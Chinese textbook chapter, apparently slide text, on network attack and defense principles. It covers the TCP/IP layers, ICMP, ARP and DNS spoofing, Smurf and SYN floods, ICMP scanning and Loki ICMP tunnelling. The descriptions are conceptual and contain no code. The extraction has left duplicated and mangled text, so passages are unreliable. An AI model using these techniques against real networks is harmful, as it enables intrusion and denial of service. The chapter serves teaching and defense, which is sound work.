网络攻击和防御

1、1 第八章 网络攻击和防御原理 2 本章内容概要 一、简介简介 网络分层结构 控制报文协议 (ICMP) TCP连接规程 二、叙述叙述他们的漏洞和对策 三、构造安全可靠的防火墙攻防模型构造安全可靠的防火墙攻防模型 四、概括概括叙述网络防御技术的发展方向 3 本章目录 8.1 网络分层结构和安全性简介 8.2 基于控制报文协议的网络攻击和防御网络攻击和防御 8.3 基于TCP连接规程的网络攻击和防御网络攻击和防御 8.4 基于TCP与ICMP分组组合的网络攻击和防御网络攻击和防御 8.5 基于网络防御设备的 攻防模型攻防模型 8.6 网络防御技术的新进展网络防御技术的新进展 4 8.1 网络分层

2、结构和安全性简介 8.1.1 概述 8.1.2 网络接入层 8.1.3 互联网层(IP层) 8.1.4 传输层 8.1.5 应用层 8.1.6 TCP/IP信息包构造 5 8.1 网络分层结构和安全性简介 在简要介绍网络分层结构的基础上， 评估每一层的安全漏洞和对策评估每一层的安全漏洞和对策。 6 8.1.1 概述 1开放系统互连参考模型 国际标准化组织(The International Organization for Standardization，ISO)创建一个七层模型，它是是 为网络通信创建一个标准为网络通信创建一个标准。该模型称作开放系统开放系统 互连互连(the Open Sy

3、stems Interconnection，OSI)参考 模型。OSI模型从一个很高的层次对网络系统进模型从一个很高的层次对网络系统进 行了描述。行了描述。O S I模型总共包含了七层。从最顶部 的“应用层”开始，一直到最底部的“物理层”， 这七个层的描述如表8-1所示，它完整阐述了最基 本的网络概念。图8-1展示的正是O S I模型的样子。 7 图8-1 OSI开放系统连接参考模型 数据链路层 网络层 传输层 会话层 表示层 应用层 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 物理层 数据链路层 网络层 物理层 数据链路层 网络层 物理层 1 Q 2 Q 3 Q 1 P 2

4、P 3 P 1 R 2 R 3 R 6 P 7 P 5 P 4 P 主机网络设备网络设备主机 8 表8-1 OSI网络模型 层 描 述 应用层为用户提供相应的界面为用户提供相应的界面，以便使用提供的网络服务 表示层完成数据的格式化 会话层控制两个主机间的通信链路控制两个主机间的通信链路( (开放、运行和关闭开放、运行和关闭) ) 传输层提供数据传输服务提供数据传输服务( (可靠或不可靠两种可靠或不可靠两种) ) 网络层 在两个主机之间提供一套定址提供一套定址/ /寻址机制寻址机制，同时负责 数据包的路由选择 数据 链路层 控制两个主机间的物理通信链路，同时还要负责对 数据进行整形，以便在物理媒

5、体上传输 物理层 物理媒体负责以一系列电子信号的形式，传出数据 9 TCP/IP协议 TCP/IP协议族无疑是当今流行最为广泛的 网络互联协议，人们今大所熟悉的绝大多数 Internet服务都是架构在该协议族之上的。 TCP/IP 与OSI的体系结构都是采用分层 结构，结构中的下层向上层提供服务。这种 分层结构具有模块划分清晰，扩展性好等优 点，所以被TCP/IP和OSI所采用。虽然TCP/IP 和OSI都是采用分层结构，它们之间还是存在 着许多重要的区别。 10 TCP/IP与OSI分层架构间的对应，见下图。 OSI具有完整的七层架构，而TCP/IP则只定 义了3种层次的服务。TCP/IP应

6、用服务层， 对应到OSI架构中的应用层、表示层以及会 话层。两者之间最大的不同点在于OSI考虑 到开放式系统互联而设定了数据表示层，而 TCP/IP的网络层与传输层，则分别与OSI的 网络层和传输层的功能大致相同，此外， TCP/IP本身并没有提供物理层和数据链路层 的服务，所以一般是架在OSI的第一、二层 上运作。 11 TCP/IP与OSI七层体系结构的对应关系 OSITCP/IP 应用层应用层 表示层 会话层传输层 传输层 网络层Internet层 数据链路层网络接入层 物理层 12 TCP/IP各层协议集族 应用层TelnetFTPHTTPSMTP DNS 传输层TCPUDP 网络层I

7、P ARPRARPICMPIGMP 数据链路层 逻辑链路子层 介质访问子层 物理层SONET/SDH/PDH 13 IP数据包 版本头部长 服务类型总长 标识标志片偏移 Time to Live协议头部校验和 源IP地址 目的IP地址 IP选项（如果有） 数据 14 TCP/IP信息包创建过程 电子邮件首先传输到mail 服务器 mail服务器对收件人创建 一个邮件会话 mail服务器堆栈弹出TCP 页眉 把TCP信息包封成IP数据报 把IP数据报依次压入物理媒 体信息包 四个参数四个参数: :即即TCPTCP端口号端口号( (应用应用 层和传输层层和传输层) )、源、源IPIP地址、地址、

8、目标目标IPIP地址地址( (互联网层互联网层) )和和 目目标物理地址目目标物理地址( (网络接入网络接入 层层) )。 15 4层结构优点:路由器功能强 直到网络层连接好前，路由器必须了解 信息包的结构，也就是说路由器必须知道 上述四个参数。路由器依靠这只四个参数 干预、指行信息包从一台计算机到达处于 适当位置的接收计算机。 从TCP/IP信息包包装结构知道，路由器 需要在不同的层次上操作，这种特性使得 路由器适合用于信息包的过滤。信息包的 过滤功能在防火墙和虚拟专用网络中有重 要的作用。 16 4层结构的缺陷: 黑客旁路 封装的处理方法可能被TCP/IP协议栈某一层所修改。例如， 黑客可

9、以通过你公司网络中一个不用的路由器直接旁路公 司的应用程序网关来发送病毒。病毒将居留在应用层的堆 栈中,并且将不被路有器检测到，因为路由器只查看互联 网层(IP)。黑客能够使用信息包嗅探器中途截获和读取数 据报。 为了最好保护一个网络，用于TCP/IP 协议栈中各层的地 址应个别地安全地给出 17 8.1.2 网络接入层 TCP/IP协议栈的最底层是网络接入层 (Network Access 因为它包括OSI模型中的第1，2层, 所以又称物理/数据链路层(Physical/data link layers)。 18 1物理/数据链路层功能 物理层由在光纤，同轴电缆，双绞线，调 制解调器线路和红

10、外线上传输的电信号组 成。只要数据是在任何媒体上传输，物理 层总是存在的。数据链路层定义来自物理 层的信号如何重新集合成一个可用的格式。 19 2物理/数据链路层的保护 为了维持这些层的安全，需要了解保护 网络所用的网络技术。黑客攻击和检测一 个网络的普遍的方法是在公司内部机器上 安装一个信息包嗅探器或者把一个窃听装 置连接到物理媒体上。使用加密技术，数使用加密技术，数 据标签据标签(data labels)和通信量填充和通信量填充(traffic padding)等方法，使得黑客很难利用从信 息包嗅探器上获得的信息。 20 3网络接入层协议 网络接入层使用的协议 帮助主机主机- -主机完成通

11、信主机完成通信。 大部分的安全威胁不起源于TCP/IP协议栈中 的这一层；但是需要了解使用了什么协议。 21 8.1.3 互联网层(IP层) 互联网层(Internet layer,IP)是整个网络体网络体 系结构的关键部分系结构的关键部分，本节叙述互联网层的互联网层的 功能和弱点功能和弱点。 22 1互联网层主要功能 IP层主要用于寻址主机和路由主要用于寻址主机和路由，不提供任何 误差修正或流量控制的手段。为了传递IP 数据报(datagrams) ，IP层使用最佳的服务 器。 由于各个分组独立地被发往目的地，它们达 到时的顺序可能发生颠倒，因此应由高层 对其重新排序。 23 2.互联网层容

12、易遭攻击的原因 公开的IP层体系结构 每一个IP数据报独立地从一个主机发往另 一个主机 很多协议都是实时在运行 IP哄骗(IP spoofing) 是使用假的IP地址代替 源IP地址。因为TCP/IP开放的体系结构没有 内置的认证，所以一个主机能够使用另一 种身份哄骗。 24 3.弱点之一:基于域名服务器的欺诈 当客户PC机请求访问Microsoft的Web网站时，其浏览器于是 通过查询DNS域名服务器尝试把主机名 解析成一个IP地址(如图中#1)。由于DNS服务器高速缓存 已被攻击者麻醉，因而回送的是 的IP地址 而不是的IP地址(如图中#2)。现在，客 户PC机想与网站通信，实际是在与黑

13、客网站通信(如图中#3)。 25 4.互联网层弱点之二: Smurf攻击 一个Smurf 攻击是黑客发送一连串pings 到众多 的远程主机。所有远程计算机响应ping，对目标 IP地址作回答，而不是对黑客的真实的IP地址作 回答。然后目标IP地址淹没在因特网控制消息协 议的信息包中，并且不能长期正确运行。Smurf 攻击是拒绝服务攻击的一个例子。 26 8.1.4 传输层 本节叙述传输层功能，扼要介绍传输控制 协议和用户数据报协议的异同点，突出端 口和套接口的概念。 27 1传输层主要功能 传输层(The transport layer)又称主机-主机层(Host- to-Host Laye

14、r)。传输层使用两个端到端的协议： 传输控制协议(Transmission control protocol，TCP) 和用户数据报协议(user datagram protocol，UDP)， 控制主机之间的信息流。TCP是负责把消息放置 到自带寻址信息的数据报(datagrams)中，到达目 的地后，重新集合数据报，并重发任何迷路的数 据报。和TCP不同，UDP不提供把消息分划成数 据报和在另一端重新集合消息的服务。明确规定， 当数据到达后，UDP不规定数据报的先后顺序。 因为这两个协议都使用端口来接收和发送信息， 所以端口设置是执行因特网安全措施的关键。 28 2传输控制协议（TCP）

15、TCP是一个面向连接协议。为使源端主机和目的端 主机上的对等实体进行会话, 协议要求两主机之 间完成以下操作: 进行握手处理; 每完成一次连接,需要交换信息; 连接完成后,才开始通信。 因为以上操作可以确保数据无差错的传送并能 进行流量控制,所以大多数因特网服务采用TCP协 议，包括 HTTP(the World Wide Web),TCP FTP, 和 SMTP (email)。但是握手处理给黑客提供攻击的 机会。 29 3用户数据报协议（UDP） UDP是一个无连接的协议，它既不能保证 数据的可靠传送，又不能进行流量控制， 但因其简单、高效，因此经常用于广播类 型的协议和一次性请求查询的客

16、户/服 务器模式以实现对分组丢失不敏感的实时 语音视频信息的传送。 因为一个主机发布一个UDP消息，并不指 望有一个回音，所以在这种数据报类型中 想嵌入恶意行为是困难的。另外，使用 UDP攻击淹没端口是可能的。 30 4. 非连接型通信与连接型通信的差别 TCP采用连接型的工作方式，UDP采用非连接 型的工作方式。非连接型通信与连接型通信二者 之间存在着一个重要的差别，即连接对通信要确 定前后的顺序。利用这种前后顺序关系，TCP能 够使各个报文之间建立一定的联系，并根据这一 关系来标识各个报文的顺序。此外，如利用这种 前后关系TCP就能识别重复的报文，那么还可确 定某个特定报文是否丢失。TCP

17、利用发送接收 序列号和校验和来保证可靠的传输数据。 这种连接过程很容易被目标系统检测到，给黑 客提供攻击的机会，所以完整的TCP连接过程的 隐秘性不好。 31 5.握手处理给黑客提供攻击的机会 攻击者会发送一个从系统A到系统B的SYN分组，不过他会用 一个不存在的系统伪装源地址。系统B于是试图发送一个TCP 端口号的同步/接收确认(SYN/ACK)分组到这个欺骗性的地址。 如果攻击者冒充的地址不存在。这么一来，系统B发出 SYN/ACK分组后，却再也收不到相应的RST分组或ACK分组。 系统B现在承担着把这个潜在连接设置完毕的义务，直到连接 建立定时器发生超时而把该潜在连接冲刷出连接队列为止。

18、一 般设在75秒23分钟之间。 32 8.1.5 应用层 在TCP/IP参考模型中没有会话层和表示层。 在传输层之上是应用层(application lyer) 本节概述应用层主要功能、安全漏洞及应 用层程序的分类。 33 1应用层主要功能 在开放系统互连(OSI)的通信模型中，应用层为 保证通信的应用程序提供服务，例如为用户提供 相应的界面，以便使用提供的网络服务。应用层 不是做通信工作的应用程序。应用层是在应用程应用层是在应用程 序层次上负责接入序层次上负责接入TCP/IPTCP/IP的网络服务的网络服务。这些网络 服务包括动态主机配置协议，域名系统，超文本 传输协议，文件传输协议，远程登

19、录，简单邮件 传输协议和简单网络管理协议。 34 2应用层的保护 应用层的保护是最困难的。在TCP/IP 协议栈 上可能用作应用程序的TCP和UDP的端口合起来 超过130,000个基于在每一个应用程序上保护网 络是困难的，一个好的途径是只允许一些独特的 应用程序通过网络通信 在应用层的安全是通过作为代理服务器的应用 层网关实现的，并将在8.5.1节讨论。 35 3应用层程序的分类 客户应用程序 服务器或后台程序 服务器应用程序 36 客户应用程序 客户机应用程序 (Client applications)是用于发起和其他主机通 信的。 当客户机程序与一个服务器建立一个TCP 会话时，它将使用

20、短暂的端口发起会话。 短暂的端口号范围通常是在10255000。 37 服务器或后台程序 除了服务器应用程序总是在执行外，一个TCP/IP 应用程序的服务器端和客户机端是类似的。当主 机首先启动时，主机配置的所有服务器应用程序 自动启动，并在明确的TCP 或 UDP 端口号上忙 于侦听任何一种请求。 例如，一个用户为了接收和发送email ，必须装 载因特网mail 应用程序。 但是，mail 服务器它 自己必须总是在执行，以允许客户访问email应用 程序。Microsoft Windows NT 把它的服务器称作 应用程序服务器，UNIX 把它们称作后台程序 (daemons)。 38 服

21、务器应用程序 服务器应用程序(Server applications)经常是黑客 攻击的目标。当新的一个版本发布或当前一个版 本得到修改，黑客将试图发掘应用程序的弱点。 为了最好保护你的服务器免受攻击，需要严密的 知道正在执行的服务器应用程序，所以你要监控 和过滤入站的通信量。 一个普通的黑客技术是在主机上装载一个违法的 服务器应用程序，该程序有计划击败主机或网络 的安全结构。很多工具，特别是应用层工具可用 于击败违法的服务器服务。 39 8.2 基于控制报文协议的网络攻击和防御 8.2.1 控制报文协议简要介绍 8.2.2 假冒源IP地址、路由信息进行欺诈和邻 机嗅探 8.2.3 邻机监听

22、8.2.4 ICMP诊断、ICMP查询和 ICMP隧道的远程控制攻击 8.2.5 带宽耗尽攻击 40 本节在简要介绍因特网控制报文协议(internet control message protocol，ICMP)的基础上， 阐述表8-3所示的黑客攻击的原理和对策。 41 表8-3 黑客攻击及其利用的漏洞 黑客攻击实例 所利用的漏洞 假冒源IP地址路由 信息欺诈和邻机嗅探 邻机侦听 ICMP扫描ICMP查 询和ICMP隧道远程控制 攻击 带宽耗尽攻击 ICMP的邻机发现 新入网主机搜索路 由器 ICMP诊断 ICMP广播组播 组成员 42 8.2.1 控制报文协议简要介绍 IP层协议最重要的任

23、务是按照系统间的连接 关系，提供寻路(routing)功能。包括邻机的 发现、地址分配的控制和组成员管理等。 IP层协议也提供差错报告和诊断报告的功 能。TCP/IP将这些功能综合成一个协议， 即ICMP。 43 1.ICMP报文格式 ICMP虽然是网络接入层协议，但要将ICMP报文放入IP 分组中发送。下一个头标值58表示ICMP报文。由图可见， ICMP报文的公共头标是由1个字节的类型、1个字节的代 码和2个字节的校验和组成。 版 本业 务 量 类 型流 标 记 净 荷 长 度下 一 个 头 标 5 8中 继 点 限 制 信 源 地 址 目 的 地 址 I P 头 标 I C M P 类

24、型I C M P 代 码校 验 和 I C M P 报 文 内 容 I C M P 报 文 44 (1)ICMP报文的类型之一 报文内容 IPv4中类型IPv6中类型 不能到达信宿差错报文分组过大 差错报文 超时差错报文 参数问题差错报文 回应请求报文 回应应答报文 组成员查询 组成员报告 3 8 0 1 2 3 4 128 129 130 131 45 ICMP报文的类型之二 报文内容 IPv4中类型IPv6中类型 组成员结束 路由器请求 路由器公告 邻机请求 邻机公告 重定向 时戳请求 地址掩码请求 13 17 132 133 134 135 136 137 46 (2)信源IP地址的选择

25、 在ICMP标准中给出了四种选择信源IP地址的规则。 前两个规则是针对针对ICMPICMP应答报文制定的应答报文制定的。应答报文的信源 地址必须是原报文中的目的地址。但是如果原报文是组播 组或任播组报文，则应答报文必须将收到该请求的接口的将收到该请求的接口的 IPIP地址作为信源地址地址作为信源地址。 第三个规则适用于差错报文。应将报告出错信息的系统的报告出错信息的系统的 地址作为信源地址地址作为信源地址。 主动发送的ICMP报文及不适用上述规则的ICMP报文应该 遵循第四个规则，也就是说，把发送此ICMP报文的链路链路IPIP 地址作为此报文的信源地址地址作为此报文的信源地址。 在邻机发现(

26、neighbor discovery)中也确定了ICMP报文的目 的地址。该目的地址应是链路局域地址(如果信宿是组播， 则组播地址应是链路局域范围的地址)。这一限制将邻机发 现的范围限制在局域链路。 47 8.2.2 假冒源IP地址和路由信息进行欺诈 和邻机嗅探 1.ICMP的邻机发现 2. 攻击者怎样利用ICMP邻机发现的漏洞? 48 1. ICMP的邻机发现 邻机发现是ICMP最重要的功能之一。利用邻机 发现的功能，系统能找到该链路上的其他主机和 路由器。 (1)地址解决 将将IPIP地址转换成网络物理地址的操作地址转换成网络物理地址的操作 称作地址解决称作地址解决(aAddress re

27、solution) (2)路由器的发现 (3)路由重定向 49 由4个主机组成的以太网及其主机的地址 主机名 称 IP地址 以太网地址 工作站 微机 MAC 小型机 FE80:0800:2001:C782 FE80:0000:C033:6382 FE80:0800:0704:0388 FE80:0800:5A00:B2C4 080020-01C782 020701-33D692 080007-040388 08005A-00B2C4 50 (1)地址解决 邻机发现是由发往网络的第一个IP分组实 现的功能。下面以上图为例，分析工作站 向PC机发送IP分组的情况工作站知道PC机 的IP地址，但不知

28、道PC的以太网地址。将将 IPIP地址转换成网络物理地址的操作称作地地址转换成网络物理地址的操作称作地 址解决址解决(aAddress resolution)，它是ICMP的 重要功能之一。 51 (1)地址解决(在局域网内部) 52 图8-12 邻机请求报文 53 在说明ICMP报文之前，应注意该报文使用 的IP头标，其中两个域特别重要。(1) 第一个是中继点限制域，其值置成255。255是此域的 最大值，收到此报文的所有系统，在回送应答之前要 对此值进行确认。如请求报文以不足255的中继点限 制值到达，则它肯定是通过路由器传来的IP分组。因 地址解决只限制在单一链路内，故对从局域链路以外

29、来到的报文不予理睬。 在IPv6中，为了只在单一链路内交换地址解决报文， 引入了若干附加的规程，利用此规程强化网络安全， 使远程系统不能伪装局域系统，窃取局域系统的报文。 在邻机请求报文中ICMP类型码135表示邻机请求。代 码值0表示发信者是主机；代码值1表示路由器。对象 地址(target address)是发信者请求的IP地址。 54 在说明ICMP报文之前，应注意该报文使用 的IP头标，其中两个域特别重要。(2) 接在该报文的对象地址之后的是一系列供查询用的选 项。第一个选项表示类型的代码域，第二个选项表示 以8字节为单位的选项值的长度域。 邻机请求报文中必定包含发信者链路地址(sen

30、ders link address)，它又称作信源链路层地址(source link- layer address)。链路地址选项的选项代码为1。选项长 度因网络类型而异。在以太网中以8字节为单位，足 以装入6字节的以太网地址。工作站在此域中正确地 装入自己的以太网地址，这样做的理由是使PC回送应 答时能知道向哪里回送，也就是说当PC向工作站发送 IP分组时就不必进行邻机请求的操作了。 55 在说明ICMP报文之前，应注意该报文使用 的IP头标，其中两个域特别重要。(3) 当此工作站得不到请求的应答时，此后只可重复9次 的请求，并在各个请求之间至少应空出1秒的间隔。 下面继续对此例进行说明。P

31、C机在收到请求后，应 回送应答报文。图8-13示出了这一应答，图8-14给出 了此时的邻机公告报文的格式。邻机公告报文的格 式几乎和请求报文的格式相同，包括对象地址选 项和对象链路地址(targets link address)，后者又称作 对象链路层地址(targets link-layer address)。作为选 项的对象链路地址的代码取作2。图8-14中R，S是两 个新标志(flag)。R表示发送该报文的系统是否为路 由器(R为1时为路由器)；S表示该报文是对请求的应 答还是自发的报文(S为1时表示应答) 56 邻机公告报文 57 (2)路由器的发现 当主机需要通信的范围超过局域网时，

32、仅仅靠地址解决是不 能完成的，主机应找到路由器。作为邻机发现功能的一部分， ICMP给出了区分路由器和主机的方法，即向网络发送路由 器公告报文的方法。 58 (3)路由重定向 (2)IP分组在网络中非高效的传送 (1)PC对路由器进行选择 (3)对主机的重定向 59 (4)邻机消失的检测 ICMP通过定期向邻机发送邻机请求报文来确认其 存在。 邻机以邻机公告报文应答，如果该公告报文的S置 1，那么就能够确认该邻机处于可能到达的状态。 图8-14所示的S表示该公告报文是对请求报文的应 答，因此十分重要。如果此位未被置位，表示该 公告报文是自发的(即不是对请求报文的应答)，因 此，该邻机实际上没有

33、收到此系统发来的请求报 文。 邻机公告报文中还有一个R(参阅图8-14)，它也在 NUD中发挥作用。当从路由器收到邻机公告报文 时，必须对此位进行校验。如果R未置成“1”，则 该邻机已不具有路由器的功能。今后，本系统为 向远程信宿传送的业务量不可发往该邻机。 60 2. 攻击者怎样利用ICMP邻机发现的漏洞? 与ICMP邻机发现相关的地址解决路由 发现路由重定向和邻机消失的检测没有 或只有很弱的认证机制，这给攻击者变换 合法路径提供了良好的机会。攻击者往往 通过假冒源IP地址篡改路由表改变网卡 工作模式就能进行拒绝服务的攻击，即受 到攻击者侦听；或者被路由到不存在的黑 洞网络上，使通信失败。下

34、面举例说明。 61 (1)基于局域网的嗅探原理 网卡一旦处于网卡一旦处于 随意模式随意模式，嗅嗅 探程序软件就探程序软件就 能捕获并分析能捕获并分析 本地以太网段本地以太网段 上流动的任何上流动的任何 分组分组.所以所以在共 享媒体上发送 分组，实际上 同一网段的所 有侦听设备都 收到了这些分 组 62 (2)基于地址解决协议重定向的欺诈 打开侦听程序后，攻击系统发送假冒的ARP给源主机,声称是默认 网关.源主机更新其ARP表格,刷新了默认网关的硬件地址.然后,源主 机上的用户开始与默认网关会话,它的分组不是发给合法的默认网 关,而是发给了攻击系统，因为其ARP表已修改,同时攻击系统的硬 件地

35、址和默认网关的IP地址也作了映射.因此,所有的网络分组都会 经攻击系统转发给默认网关，因为攻击系统已打开IP的转发功能， 可像路由器一样转发所有的IP分组。 63 (4)基于路由信息协议的欺诈 当客户收到两个或超过两个路由器发来的公告报文时,客户很难由 自己决定选择哪一个路由器更高效,需要靠路由器发送ICMP重定向 报文,告诉客户通往特定信宿更高效的路径.如果某攻击者伪装成路 由器,发送虚假的ICMP重定向报文,会发生什么情况呢 64 8.2.3 邻机侦听 如果在如图8-15所示的由4个主机和一个路 由器组成的以太网内增添一台笔记本电脑， 网络管理员如何及时发现它呢？或者说， 新接入的主机如何

36、及时接入网络？这可以 按照ICMP邻机发现规程来实现，即新主机 接入网络后，立即发送路由器请求报文， 不需要等待路由器发送路由器公告报文就 可发现路由器。图8-24示出了新入网的主 机搜索路由器的机制。 65 新入网的主机搜索路由器 新入网主机发出的路由器请求报文是发给以太网内每台主机 的，所以同一网段的所有侦听设备都收到了这个路由器请求 报文，并从路由器请求报文可以看出，侦听设备也及时掌握 了新入网主机的IP地址和物理地址，从而使侦听设备能够从 以太网段上流动的任何分组中分离出与新入网主机有关的IP 分组内容。因而，一台笔记本电脑接入到新的局域网时，用 户应该有足够的抵御非授权访问的措施。

37、66 路由器请求报文 67 8.2.4 ICMP诊断 ICMP查询 ICMP隧道的远程控制攻击 68 1. ICMP诊断 按照因特网控制报文协议ICMP实施的网络 诊断是ICMP最简单的功能之一，也是 ICMP难得的功能之一。 利用诊断报文，ICMP可以确定两个系统能 否进行通信。通过发送“回应请求(echo request)”报文和等待“回应应答(echo reply)” 报文来进行诊断。几乎所有的操作系统都 可以通过ping这一命令来利用这种服务， 但有时这种服务也很容易被滥用。 回应应答报文与回应请求报文具有相同的 域。 69 6业 务 量 类 型流 标 记 净 荷 长 度下 一 个 头

38、 标 : 5 8H o p 限 制 信 源 地 址 目 的 地 址 类 型 : 1 2 8代 码 : 0校 验 和 在 “ 回 应 应 答 ” 中 应 回 送 的 任 意 数 据 标 识 符序 列 号 ICMP回应请求报文格式 70 ICMP回应应答报文格式 6业 务 量 类 型流 标 记 净 荷 长 度下 一 个 头 标 :58Hop限 制 信 源 地 址 目 的 地 址 类 型 :129代 码 :0校 验 和 如 在 “ 回 应 请 求 ” 中 置 入 数 据 ， 应 将 该 数 据 复 制 在 此 域 中 标 识 符序 列 号 71 2. 攻击者怎样利用ICMP诊断安全上的漏洞 (1)使

39、用ICMP诊断扫描 确定目标系统是否在活动 (2)使用ICMP查询 获取目标系统更多信息 (3)ICMP隧道远程控制攻击 72 (1)使用ICMP诊断扫描确定目标系统是 否在活动 攻击者确定某一个具体系统(包括主机路由器防火墙等) 是否在活动，从理论上有两种办法。 使用ICMP诊断确定两个系统能否进行通信，通过发送 “回应请求”报文和等待“回应应答”报文来进行诊断。 如果两个报文匹配，则可以确定目标系统在活动，也就 是说，攻击者发现了攻击目标。 按照Internet TCP连接规程向某个目标系统发送“连接请 求”分组和等待回送“连接确认”分组。如果两个分组 匹配，则可以确定目标系统上打开的即为

40、正在侦听的端 口，从而确定系统在活动。这种扫描方法称作网络端口 扫描(port scanning)。关于更多的端口扫描信息请参阅 8.3.4 节“TCP连接规程与端口扫描”。 73 (2) 使用ICMP查询获取目标系统更多信息 采用ICMP查询方法，也就是通过向某个系统发送 ICMP报文，就能够汇集关于它的各种有价值的信 息。 例如，向某个系统发送ICMP类型为13的消息即时 戳请求报文，就能请求回送系统的时间(目的是查 看系统所在时区)。改用ICMP类型为17的消息即 地址掩码请求(address mast request)报文，就能请 求回送某个设备的子网掩码。知道网卡的子网掩 码很重要，

41、因为你可以根据它确定正在使用的所 有子网。有了关于子网的知识后，就可以只攻击 特定的子网。 74 (3) ICMP隧道远程控制攻击 (1) VPN的基本概念 (2) 隧道技术 封装化操作 在VPN设备上生成隧道 (3)ICMP隧道技术 75 (1) VPN的基本概念 虚拟专网(virturl private network, VPN)是利 用接入服务器(access server)广域网上的 路由器及VPN专用设备在公用的WAN上实 现的虚拟专网的技术。也就是说，用户觉 察不到他在利用公用WAN获得专用网的服 务。这里所说的公用网包括因特网、电信 部门提供的公用电话网、帧中继网及ATM。 为了

42、把因特网上开展的VPN服务和帧中继 网及ATM上的VPN加以区别，前者被称作 “IP VPN”。 76 LAN间连接型VPN和远程访问型VPN 主机 1 主机 2 主机 n . VPN设备 (网关) 远程访问用户 主机 1 主机 2 主机 m . VPN设备 (网关) 网点 B网点 A 远程访问型VPN： 1.连接某个终端和LAN; 2.在终端与VPN设备间建立虚拟电路 LAN间连接型VPN： 1.连接网点间的LAN； 2.在VPN设备(网关)间建立虚拟电路 Internet 77 隧道在分组前加上新IP头标封装后发往对方 隧道分组 隧道分组 VPN设备CVPN设备D Internet 分公司

43、 微机B 总部 微机A 加入头标 删除头标 数 据 源 地址B 目的 地址A 数 据 源 地址B 目的 地址A 数 据 源 地址B 目的 地址A 源 地址D 目的 地址C 分组 为封装化添加的头标 78 (2) 隧道技术 封装化操作 Internet中的隧道是逻辑上的概念，不是指修建公路或铁路 中使用的概念，是一种封装化操作。下面以连接公司总部 和分公司的VPN为例进行说明(见图8-29)。 总部的LAN和分公司的LAN上分别连有内部IP地址为A和 B的微机。总部和分公司到ISP的接入点上配置了VPN设备， 它们的全局IP地址为C和D。假定从微机B向微机A发送数 据。在分公司LAN上IP分组的

44、IP地址是以内部IP地址表示 的“目的地址A”和“源地址B”。此分组到达分公司的 VPN设备后，立即在它前部加上与全局IP地址的对应的 “目的地址C”和“源地址D”。全局IP地址C和D是为了通 过因特网中的若干路由器将IP分组从VPN设备D发往VPN 设备C而添加的。此IP分组到达总部的VPN设备C后，全局 IP地址即被删除，恢复成原IP分组发往地址A。 在IP分组上添加新头标就好像将分组置入信封一样，因此 将这种操作称作IP封装化。注意隧道的入口和出口是成对 出现的。 79 在VPN设备上生成隧道 总部和分公司配置的VPN设备将总部和分公司间 需要传输的数据封装，通过Internet自动发往

45、对方 的VPN设备。这种在VPN设备间建立的封装化数 据的IP通信路径，逻辑上称作隧道。 封装化和加密方式多种多样。一般来说，只将数 据加密的通信路径不能称作隧道。在一个分组上 再加上一个头标才称作封装化(在一种网络分组 中封装另一种网络分组称作封装化)。 80 (3)ICMP隧道技术 ICMP隧道技术是黑客发明的一种实现远程控制攻击的方法，它有 能力在ICMP分组头部封装真正的数据。它适用的范围是，当路 由器和防火墙关闭了许多服务，并且在防火墙之后已有一个受 害的系统。 黑客操作方法分为三步。第一步，Loki和lokid分别是客户和服务 器程序，它们起着两个VPN设备的作用，对客户和服务器间

46、需 要传输的数据进行封装；第二步，在防火墙后面的某个系统上 运行lokid服务器工具，攻击者运行loki客户工具；第三步，loki 把待执行的每一个命令包裹在ICMP回应请求报文中发送给lokid。 Lokid解出命令后在本地运行它们，再把结果包裹在ICMP回应 应答报文中回送给攻击者。 Loki和lokid程序给攻击者提供了一个简单的ICMP隧道技术机制， 以重新获取已经侵害过系统的访问权，这种机制能够渗透到防 火墙后面。既然许多防火墙允许ICMP和UDP分组自由出入，那 么这种邪恶的分组流动往往能够无障碍地穿透防火墙。 81 ICMP回应请求报文格式 ICMP回应应答报文格式 loki把攻

47、击者希望远程执行的命令(对应IP分组)包裹在ICMP分组或 UDP分组的首部，再发送给lokid，由它执行其中的命令，并以同 样的方式返回结果。 82 8.3 基于TCP连接规程的网络攻击和防御 本节在简要介绍因特网TCP连接规程 的基础上，阐述下列黑客攻击原理和 对策。 83 黑客攻击实例及其利用的漏洞 黑客攻击实例 所利用的漏洞 端口重定向 TCP同步(SYN)淹没和假冒 源IP地址TCP ACK攻击 端口扫描 TCP会话劫持 TCP连接的标识 TCP连接规程 TCP连接规程 TCP数据传输 84 传输控制协议/网间协议栈 TCP/IP体系结构 85 版 本 业 务 量 类 型流 标 记

48、净 荷 长 度下 一 个 头 标 ： 6中 继 点 限 制 信 源 地 址 目 的 地 址 源 端 口目 的 端 口 序 列 号 接 收 确 认 号 窗 口 号 紧 急 指 针校 验 和 偏 移控 制 域保 留 应 用 数 据 TCP选 项 IP头 标 TCP头 标 ICMP和TCP报文格式 86 UDP/TCP主要应用的已知端口号 端 口 号 UDP应用 端口 号 TCP应用 7 9 53 61 68 69 161 162 返回(echo)服务器 丢弃(discard)服务器 域名(DNS)服务器 动态主机配置协议(DHCP)服务器 动态主机配置协议(DHCP) 客户 简单文件传送协议(TF

49、TP) 简单网络管理协议(SNMP)数据 简单网络管理协议(SNMP)控制信息 20 21 23 25 53 80 110 111 119 文件传送协议(FTP)数据 文件传送协议(FTP)控制信 息 远程登录(TELNET) 简单邮件传送协议(SMTP) 域名系统(DNS) 超文本传送协议(HTTP) 主站(HOST office)协议 远程呼叫(RPC) 网络新闻传送协议(NNTP) 87 8.3 基于TCP连接规程的网络攻击和防御 8.3.1 端口重定向 8.3.2 TCP同步淹没和假冒源IP地址伪装攻击 8.3.3 TCP连接规程与端口扫描 8.3.4 TCP数据传输和TCP会话劫持

50、88 8.3.1 TCP连接标识上的漏洞 计 算 机 工 作 站 计 算 机 工 作 站 计 算 机 工 作 站 计 算 机 工 作 站 远 程 登 录 文 件 传 送 文 件 传 送 使用套接口可以惟一的标识一个连接。而套接口由IP地址和端 口组成。IP地址标识一个系统, 端口号则用来区分该系统内的各个 应用。因为一个系统可以拥有多个端口，这样做增加了系统的功因为一个系统可以拥有多个端口，这样做增加了系统的功 能，但是对于攻击者来说，也是有利可图的。能，但是对于攻击者来说，也是有利可图的。例如在有防火墙等 网络设备对直接远程连接进行阻挡的情况下，有经验的攻击者就 可能利用端口重定向技术绕过这

